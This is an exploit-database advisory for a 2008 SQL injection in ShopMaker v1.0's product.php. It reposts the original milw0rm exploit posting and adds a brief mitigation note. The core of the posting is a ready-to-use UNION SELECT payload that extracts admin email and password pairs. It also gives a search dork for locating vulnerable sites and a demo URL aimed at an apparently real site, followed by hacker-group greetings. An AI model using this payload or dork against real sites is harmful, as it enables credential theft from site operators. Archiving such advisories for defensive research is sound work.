ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability

vendor:

ShopMaker

by:

Hussin X

CVSS

HIGH

SQL Injection

CWE

Product Name: ShopMaker

Affected Version From: ShopMaker v1.0

Affected Version To: ShopMaker v1.0

Patch Exists: YES

Related CWE: N/A

CPE: a:shopmaker:shopmaker:1.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The malicious request contains an SQL query that is appended to the vulnerable parameter. This allows the attacker to execute arbitrary SQL commands on the underlying database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|--------------------    Hussin X  -------------------|
|
|    Author: Hussin X
|
|    Home :  WwW.IQ-ty.CoM
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|___________________________________________________
|                                                                                                     |
|
| script : http://shop.maker.ir
|
| DorK   : "ShopMaker v1.0"
|___________________________________________________|

Exploit:
________



www.[target].com/Script/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin--


DemO :


http://shop.maker.ir/shop/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin--


____________________________( Greetz )_________________________________
|
|   All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
|_____________________________________________________________________


                   Im IRAQi    |    Im TrYaGi 

# milw0rm.com [2008-10-21]